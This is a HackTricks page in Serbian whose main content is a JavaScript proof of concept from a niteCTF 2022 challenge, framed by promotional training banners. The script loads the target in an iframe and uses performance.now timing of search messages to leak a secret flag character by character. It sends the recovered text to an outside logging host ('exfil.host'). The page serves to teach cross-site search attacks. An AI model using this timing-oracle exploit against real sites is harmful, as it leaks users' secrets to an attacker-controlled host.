hacktricks/pentesting-web/xs-search/performance.now-example.md

73 lines
3.4 KiB
Markdown

# performance.now пример
{% hint style="success" %}
Učite i vežbajte AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Učite i vežbajte GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Podržite HackTricks</summary>
* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)!
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili **pratite** nas na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Podelite hakerske trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
</details>
{% endhint %}
**Primer preuzet sa [https://ctf.zeyu2001.com/2022/nitectf-2022/js-api](https://ctf.zeyu2001.com/2022/nitectf-2022/js-api)**
```javascript
const sleep = (ms) => new Promise((res) => setTimeout(res, ms));
async function check(flag) {
let w = frame.contentWindow;
w.postMessage({'op': 'preview', 'payload': '<img name="enable_experimental_features">'}, '*');
await sleep(1);
w.postMessage({'op': 'search', 'payload': flag}, '*');
let t1 = performance.now();
await sleep(1);
return (performance.now() - t1) > 200;
}
async function main() {
let alpha = 'abcdefghijklmnopqrstuvwxyz0123456789_ABCDEFGHIJKLMNOPQRSTUVWXYZ-}';
window.frame = document.createElement('iframe');
frame.width = '100%';
frame.height = '700px';
frame.src = 'https://challenge.jsapi.tech/';
document.body.appendChild(frame);
await sleep(1000);
let flag = 'nite{';
while(1) {
for(let c of alpha) {
let result = await Promise.race([
check(flag + c),
new Promise((res) => setTimeout(() => { res(true); }, 300))
]);
console.log(flag + c, result);
if(result) {
flag += c;
break;
}
}
new Image().src = '//exfil.host/log?' + encodeURIComponent(flag);
}
}
document.addEventListener('DOMContentLoaded', main);
```
{% hint style="success" %}
Učite i vežbajte AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Učite i vežbajte GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Podržite HackTricks</summary>
* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)!
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili **pratite** nas na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Podelite hakerske trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
</details>
{% endhint %}